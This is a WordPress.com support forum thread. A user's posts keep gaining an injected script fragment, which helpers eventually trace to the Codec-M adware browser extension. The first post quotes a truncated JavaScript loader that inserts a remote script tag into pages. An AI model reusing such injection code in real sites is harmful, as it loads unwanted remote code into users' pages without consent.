Need help? Check out our Support site, then

Weird ink appears at the bottom of new post when i press update

  1. I just recently created my new blog. But everytime i write anything, whether on the about me section or a new post, and then i place update to save it, a weird link automatically comes at the bottom of what i wrote:

    // -1?’https’:'http’;var ccm=document.createElement(‘script’);ccm.type=’text/javascript’;ccm.async=true;ccm.src=http+’://’;var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);jQuery(‘#cblocker’).remove();});};
    // ]]>

    I tried deleting it, i tried deleting my blog and recreating it... and nothing helped. I still get the same link on every new post or every new page or anything i try to add on my blog.

    Can anyone help me solve this problem?

    The blog I need help with is

  2. Can you give us a link to your blog, starting with http?

  3. Thanks. This is very unusual. It looks like staff are tinkering with the theme to perhaps put more ads in or something. Do you have any upgrades at all?

  4. The thing is i tried different themes. I changed the theme over 4 times and with each new theme, it does the same thing. I don't have any upgrades. I only have this one blog which i recreated yesterday after having deleted my old blog because of the same problem.

    And it's still doing the same thing till now. Even in the About me section, i get the same weird link when i press update.

    I checked everywhere online to see if i could actually delete my whole account with wordpress and activate another one, but there is no option of deleting an account.

  5. I don't think this is anything you're doing and I don't think it's anything you can fix right now. That it's happened on two separate blogs is an indication it's a WP-wide issue. It LOOKS to me like ad code that's broken.

    In my experience, staff tinkers like this on the weekends. They should have it fixed by tomorrow; if not come back and update us. Just wait it out, don't delete anything, and check back tomorrow.

  6. Cool. Thanks for your help. I'll try again tomorrow and check back.

  7. Hi. I've been trying this whole week and still, the link is appearing at the bottom of every page or post i edit or write.

    The problem has not been solved yet, what do i do?

  8. I'll modlook this thread, hopefully someone from staff will see it then.

    In the meantime, I did a Google search on the '' from the code you gave and found it's an Amazon service:

    and, while the answers aren't always brilliant, this from yahoo answers addresses a similar issue, I think:

    What the hell is

    Hope that gives some clues. I suggest that, for now, you clear your cache and then log back in and see if it helps. If it doesn't then, as Raincoaster says, it's probably mucking about with something new and there won't be anything you can do yourself.

    If it does turn out to be an ad they've placed, then you can buy the no-ads upgrade - but anyway you shouldn't be seeing any ads in your blog while you're logged in, they only appear (if there are any) to logged out users.

  9. I have seen something like that before injected by a browser extension.

    Would you please try posting with all browser add-ons and extensions disabled?

  10. Thanks guys. Can you just help me out with the following:
    how do i clear my cache. I'm on a mac if that helps.

    Also, how to disable all add-ons?


  11. Clearing your browser cache and cookies >
    Type the name of the browser and version number folowed by disable browser add-ons into Google search and find the instructions for disabling brower add-ons and extensions.

  12. I cleared cache. i DISABLED browser add-ons. And this is still happening :SSSS
    i wanna get my blog online and i can't!

  13. Can you please tell us which browser (and version of) you're using?

  14. Firefox 12.0

    it's not the browser. i tried signing and editing from another laptop and the same thing keeps happening. I am an administrator for another blog. and on both blogs, the same thing is happening.

    please help. if i can't fix this issue. can i just cancel my account and reactivate with the same email address?

  15. That wouldn't help, because it's definitely not us.

    If you do a Google search for "" you'll see many sites affected with the same problem.

    In past reports, there was a browser extension called Codec-M inserting this text.

    Does your browser have a Codec-M extension or add-on?

  16. I do but i disabled it and restarted firefox.
    should i delete it? how do i do that? is it in applications or something?

  17. Disabling it should be fine. If you want to delete it, follow this guide:

  18. Thanks for the link.

    I did disable it and restarted firefox but it's still not resolved. I cannot update or add any posts without that link showing at the bottom.

    it's not working!

  19. Ah, it looks like there's more installed than just an add-on.

    I did a quick search for "uninstall codec-m" and found a few different recommendations.

    I have never done this myself for Codec-M, so I'm not comfortable recommending any specific method.

  20. I uninstalled firefox and reinstalled it. Deleted the application codec.m from my applications folder and when i reinstalled firefox and opened it, the codec-m was still in the addons.

    i'm all out of options. i googled it and read it and did everything. I don't know what else to do.

  21. In this case, I recommend posting over in Firefox support for help with removing it.

Topic Closed

This topic has been closed to new replies.

About this Topic